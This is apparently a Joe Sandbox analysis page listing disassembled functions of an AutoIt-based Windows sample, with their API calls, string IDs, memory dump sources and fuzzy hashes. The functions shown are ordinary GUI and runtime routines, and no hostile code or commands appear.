                                                                                                                                                                            • Instruction ID: 120772ed1936db9c35a65e2b776e6c477720a313439bf6917240ada3e0959d8c
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ff3ad4169cebd35ad2d3b27d8413cf78682b09974a7d8d0701cd38090f47456
                                                                                                                                                                            • Instruction Fuzzy Hash: F021F7313002908FD7108F1BD894B177BD9FFA6315F188469E84ACB261DB71ED42CB91
                                                                                                                                                                            Function 008BEB81 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008BEBAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2434400541-0
                                                                                                                                                                            • Opcode ID: 5699ee80fe26990db61bdbace379be0d616966a23f650da308c598052510ed8f
                                                                                                                                                                            • Instruction ID: 7d188d82525f092992b7e7d31666b1605d82d92d60aeea674b85ea36da4118d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 5699ee80fe26990db61bdbace379be0d616966a23f650da308c598052510ed8f
                                                                                                                                                                            • Instruction Fuzzy Hash: DAD017BA1A03042CEC291A3CC92FEF61A08F301760F90A259B003E9795E881AD049021
                                                                                                                                                                            Function 008E0BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008E0C44
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0C7E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0CE8
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0D50
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0DD4
                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008E0E24
                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E0E63
                                                                                                                                                                              • Part of subcall function 0086FD60: _wcslen.LIBCMT ref: 0086FD6B
                                                                                                                                                                              • Part of subcall function 008B2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008B2AE8
                                                                                                                                                                              • Part of subcall function 008B2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008B2B1A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                            • Opcode ID: 4f27c02793091af3ef312705e4f2007ffbeebe4a964b190685c36850d1ac99cd
                                                                                                                                                                            • Instruction ID: b16d4308add44cffe0266f03131ed49abfc9666c6fd1ba7dca6247b6ce045c74
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f27c02793091af3ef312705e4f2007ffbeebe4a964b190685c36850d1ac99cd
                                                                                                                                                                            • Instruction Fuzzy Hash: B4E1C2312083858FCB24DF29C84186AB7E6FF95318B14496DF896DB392DB70ED85CB52
                                                                                                                                                                            Function 008524C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085259A
                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 008525A2
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008525CD
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 008525D5
                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 008525FA
                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00852617
                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00852627
                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0085265A
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0085266E
                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 0085268C
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 008526A8
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 008526B3
                                                                                                                                                                              • Part of subcall function 008519CD: GetCursorPos.USER32(?), ref: 008519E1
                                                                                                                                                                              • Part of subcall function 008519CD: ScreenToClient.USER32(00000000,?), ref: 008519FE
                                                                                                                                                                              • Part of subcall function 008519CD: GetAsyncKeyState.USER32(00000001), ref: 00851A23
                                                                                                                                                                              • Part of subcall function 008519CD: GetAsyncKeyState.USER32(00000002), ref: 00851A3D
                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,0085199C), ref: 008526DA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                            • Opcode ID: 807391f90b4ee23ad49902726e8ad0bb8e8ab7e2e3e7a8a06c14cc531d208e3e
                                                                                                                                                                            • Instruction ID: c58ab19460719f766b8e6581908742828549c3e2e4a4df538555229f3e44f9ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 807391f90b4ee23ad49902726e8ad0bb8e8ab7e2e3e7a8a06c14cc531d208e3e
                                                                                                                                                                            • Instruction Fuzzy Hash: 75B16875A00209AFDF14DFA8CC89BAA7BA5FB48315F104229FA15EB290DB70D945CB51
                                                                                                                                                                            Function 008E8C9B Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8CB9
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8CCD
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8CF0
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8D13
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008E8D51
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,008E3F79,?), ref: 008E8DAD
                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8DE6
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008E8E29
                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8E60
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 008E8E6C
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008E8E7C
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 008E8E8B
                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008E8EA8
                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008E8EB4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                            • Opcode ID: 89713d3034e1fcfccc89d9806cf7748a2ec30901fcdea5790c789bdb6967a818
                                                                                                                                                                            • Instruction ID: 781eba1d715b650032a8601fa7a7f843963d1de5bf684f9a46090ad286529f43
                                                                                                                                                                            • Opcode Fuzzy Hash: 89713d3034e1fcfccc89d9806cf7748a2ec30901fcdea5790c789bdb6967a818
                                                                                                                                                                            • Instruction Fuzzy Hash: F761DE71600259FEEB14DF65CC81BBE7BA8FB09715F108506FD19DA1D0DB74AA84CBA0
                                                                                                                                                                            Function 008C47D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 008C4852
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C485D
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C48B4
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C48F2
                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 008C4930
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C4978
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C49B3
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C49E1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                            • Opcode ID: 2c413d5eef8dd0a4874ad0f671d30ab54cf90a3c712bea6bfda70d9c969b9cfc
                                                                                                                                                                            • Instruction ID: f527c8c90b7226683ed9f2eaa619dca05003bd8dd5b0f104dec40ca12d555793
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c413d5eef8dd0a4874ad0f671d30ab54cf90a3c712bea6bfda70d9c969b9cfc
                                                                                                                                                                            • Instruction Fuzzy Hash: BF71BE326042169FC710EF28C89096AB7F4FFA4759F00592DF896D7261EB30DD89CB92
                                                                                                                                                                            Function 008B62AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 008B62BD
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008B62CF
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008B62E6
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 008B62FB
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 008B6301
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 008B6311
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 008B6317
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008B6338
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008B6352
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008B635B
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008B63C2
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008B63FE
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008B6404
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 008B640B
                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008B6462
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 008B646F
                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 008B6494
                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008B64BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                            • Opcode ID: 86a08eec0fabf2654249ff2f5cbed14feddad5f0ac2f2f998794e18eca8e0e2a
                                                                                                                                                                            • Instruction ID: 9e96a0d2b7c58689c21acf1f5dad1ff27d99caf9e2308ef1284f6a3243de0771
                                                                                                                                                                            • Opcode Fuzzy Hash: 86a08eec0fabf2654249ff2f5cbed14feddad5f0ac2f2f998794e18eca8e0e2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 05718D31900709EFDB20DFA8CE85AAEBBF5FF48704F104528E146E62A0E779E954CB50
                                                                                                                                                                            Function 008D076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 008D0784
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 008D078F
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008D079A
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 008D07A5
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 008D07B0
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 008D07BB
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 008D07C6
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 008D07D1
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 008D07DC
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 008D07E7
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 008D07F2
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 008D07FD
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 008D0808
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 008D0813
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 008D081E
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 008D0829
                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 008D0839
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008D087B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                            • Opcode ID: 0e1353aefe7c9b6d98fd46ad85a841218145cd610e14273658e72f05f474a695
                                                                                                                                                                            • Instruction ID: a0d64178825e076774f90700ee51406af32a616d99bc99b9feb1c3f1a9fdd017
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e1353aefe7c9b6d98fd46ad85a841218145cd610e14273658e72f05f474a695
                                                                                                                                                                            • Instruction Fuzzy Hash: 184145B0D083196ADB10DFBA8C8595EBFE8FF04754B50452AE51CEB291DA78E901CF91
                                                                                                                                                                            Function 00870456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00870456
                                                                                                                                                                              • Part of subcall function 0087047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0092170C,00000FA0,66094BAA,?,?,?,?,00892753,000000FF), ref: 008704AC
                                                                                                                                                                              • Part of subcall function 0087047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00892753,000000FF), ref: 008704B7
                                                                                                                                                                              • Part of subcall function 0087047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00892753,000000FF), ref: 008704C8
                                                                                                                                                                              • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008704DE
                                                                                                                                                                              • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008704EC
                                                                                                                                                                              • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008704FA
                                                                                                                                                                              • Part of subcall function 0087047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00870525
                                                                                                                                                                              • Part of subcall function 0087047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00870530
                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00870477
                                                                                                                                                                              • Part of subcall function 00870433: __onexit.LIBCMT ref: 00870439
                                                                                                                                                                            Strings
                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 008704B2
                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 008704E4
                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 008704F2
                                                                                                                                                                            • kernel32.dll, xrefs: 008704C3
                                                                                                                                                                            • InitializeConditionVariable, xrefs: 008704D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                            • Opcode ID: 9cf91bb6b79e258b1397681de8a34f7e973a81cbdbd26ae199e473c89fb5fa2a
                                                                                                                                                                            • Instruction ID: fd7a378077546019b44d719d4aa1079f2e114fa0452b43bf11ba5beddd906d29
                                                                                                                                                                            • Opcode Fuzzy Hash: 9cf91bb6b79e258b1397681de8a34f7e973a81cbdbd26ae199e473c89fb5fa2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B212932A45354EFD7106BB8AC45B2977D8FB44B69F008129F919EA395DB64CC008E61
                                                                                                                                                                            Function 008D4946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,008EDCD0), ref: 008D4A18
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008D4A2A
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,008EDCD0), ref: 008D4A4F
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,008EDCD0), ref: 008D4A9B
                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,008EDCD0), ref: 008D4B05
                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 008D4BBF
                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008D4C25
                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008D4C4F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                            • Opcode ID: cc222e9b94294cf19f0ce23c0faf8a1cfb5118a590c2e3c75149a1cdfefd3895
                                                                                                                                                                            • Instruction ID: 55aab6a089713496ea16c84223ee530f8ba10ce2fd2d061a92721e219f738b41
                                                                                                                                                                            • Opcode Fuzzy Hash: cc222e9b94294cf19f0ce23c0faf8a1cfb5118a590c2e3c75149a1cdfefd3895
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F124C71A00219EFCB14CF94C884EAEBBB5FF45318F248199E915DB261D731ED46CBA0
                                                                                                                                                                            Function 008BC80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00922990,000000FF,00000000,00000030), ref: 008BC888
                                                                                                                                                                            • SetMenuItemInfoW.USER32(00922990,00000004,00000000,00000030), ref: 008BC8BD
                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 008BC8CF
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 008BC915
                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 008BC932
                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 008BC95E
                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 008BC9A5
                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008BC9EB
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BCA00
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BCA21
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
